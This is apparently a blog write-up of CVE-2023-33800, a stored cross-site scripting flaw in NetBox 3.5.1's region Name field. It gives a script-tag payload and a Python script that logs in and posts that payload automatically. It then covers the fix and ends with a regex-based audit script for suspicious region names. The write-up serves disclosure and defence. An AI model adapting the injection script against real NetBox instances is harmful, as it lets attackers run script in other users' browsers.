NetBox is a popular infrastructure resource modeling (IRM) tool, widely used by network engineers and data centers. In May 2023, a critical stored cross-site scripting (XSS) vulnerability, tagged as CVE-2023-33800, was found in the way NetBox v3.5.1 handles user input in its Create Regions feature. This flaw lets attackers inject malicious JavaScript code by simply submitting a crafted payload into the "Name" field when creating a new region.

In this article, we’ll break down what the vulnerability is, show you how it works, and give some code snippets so you can see it in action—plus, we’ll cover ways to stay protected.

What is Stored XSS?

Stored XSS (Cross-Site Scripting) vulnerabilities happen when user-provided data is saved (stored) on the server and later rendered in the browser of other users without proper sanitization. This gives attackers a way to run their scripts anytime a victim views the crafted data, potentially leading to session hijacking, credential theft, or even a full site compromise.

How Does CVE-2023-33800 Work?

The issue is found in the Create Regions feature at the endpoint /dcim/regions/. NetBox v3.5.1 does not sanitize the "Name" field. If an attacker manages to create a region, they can insert malicious HTML/JavaScript. This payload is stored in the database, and every time a user visits the regions list or views details for this region, the payload executes in their browser context.

For this attack to work, the attacker needs access to a NetBox account with permissions to add a region.

Step 1: Create a Malicious Region

Log in and go to http(s)://<netbox-instance>/dcim/regions/add/.

Payload Example

- Field: Name
- Value: `<script>alert('XSS by CVE-2023-33800')</script>`

Step 2: Trigger the XSS

Any time a legitimate user opens /dcim/regions/ (the list) or the specific region’s detail page, the JavaScript runs in their browser context and the alert pops up.

Result

![](https://i.imgur.com/Td4boSO.png)  
*Popup on region list page. (This is a simulation image!)*

Exploit Details

Below is a Python script showing how an attacker could automate this using NetBox’s web UI.

```python
import requests
from bs4 import BeautifulSoup

# Set your NetBox instance details
url = "https://your-netbox-instance/dcim/regions/add/"
login_url = "https://your-netbox-instance/login/"
session = requests.Session()

# Replace with attacker's values
payload = "<script>alert('XSS by CVE-2023-33800')</script>"
username = "your_username"
password = "your_password"

# Get CSRF token (assuming default Django form)
r = session.get(login_url)
soup = BeautifulSoup(r.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']

# Log in
login_data = {
    "csrfmiddlewaretoken": csrf_token,
    "username": username,
    "password": password,
    "next": "/"
}
session.post(login_url, data=login_data, headers={"Referer": login_url})

# Get CSRF token for the regions add form
r2 = session.get(url)
soup2 = BeautifulSoup(r2.text, 'html.parser')
csrf_token2 = soup2.find('input', {'name': 'csrfmiddlewaretoken'})['value']

# Post the malicious region
data = {
    "csrfmiddlewaretoken": csrf_token2,
    "name": payload,
    "slug": "testregion",
    "parent": "",
    "description": "xss payload"
}
response = session.post(url, data=data, headers={"Referer": url})
print("Status code:", response.status_code)
print("Check the regions page in your NetBox instance.")
```

*This script is for educational and ethical testing ONLY! Never use it against systems you do not own or have explicit authorization to test.*

Vendor Response and Fix

The NetBox developers acted quickly after the report. The issue was fixed in version 3.5.2, which escapes or sanitizes user input on region creation.

Patch:


Audit Regions:

Check your regions list for suspicious HTML/JavaScript code.
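
One way to run that audit over exported region records, as an added example (not code from NetBox or from the original article). It assumes each record is a dictionary with `id`, `name` and `description` keys; the pattern list and sample records are constructed for illustration, and checking `description` goes beyond the Name field the advisory names.

```python
import html
import re

# Markup-like content that has no place in a region name (assumed pattern list).
SUSPICIOUS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-zA-Z!]")),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("script_uri", re.compile(r"\b(?:javascript|vbscript)\s*:", re.I)),
    ("html_entity", re.compile(r"&#?[a-z0-9]+;", re.I)),
]
FIELDS = ("name", "description")


def audit_regions(regions):
    """Return one finding per (region, field) whose text looks like markup."""
    findings = []
    for region in regions:
        for field in FIELDS:
            value = region.get(field) or ""  # tolerate missing or null fields
            reasons = [label for label, rx in SUSPICIOUS if rx.search(value)]
            if reasons:
                findings.append({
                    "id": region.get("id"),
                    "field": field,
                    "reasons": reasons,
                    # Escaped copy, safe to paste into an HTML report or ticket.
                    "escaped": html.escape(value),
                })
    return findings


# Constructed sample records; id 2 carries the payload shown in this article.
SAMPLE_REGIONS = [
    {"id": 1, "name": "EMEA", "description": "Europe & Middle East"},
    {"id": 2, "name": "<script>alert('XSS by CVE-2023-33800')</script>",
     "description": "xss payload"},
    {"id": 3, "name": "APAC", "description": "<b>Asia-Pacific</b>"},
    {"id": 4, "name": "R&D lab", "description": None},
]

if __name__ == "__main__":
    for f in audit_regions(SAMPLE_REGIONS):
        print(f"region {f['id']} {f['field']}: "
              f"{', '.join(f['reasons'])} -> {f['escaped']}")
```

Plain ampersands such as "R&D lab" are not flagged, so the check stays usable on real naming schemes; any hit should be reviewed and the record cleaned after upgrading.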

Conclusion

CVE-2023-33800 is a prime example of why input validation is critical in web applications. Since data center and network management tools like NetBox often hold the keys to your digital kingdom, vulnerabilities like this can be devastating if left unpatched. Check your NetBox, update if needed, and stay alert for similar issues in your other apps!


Timeline

Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC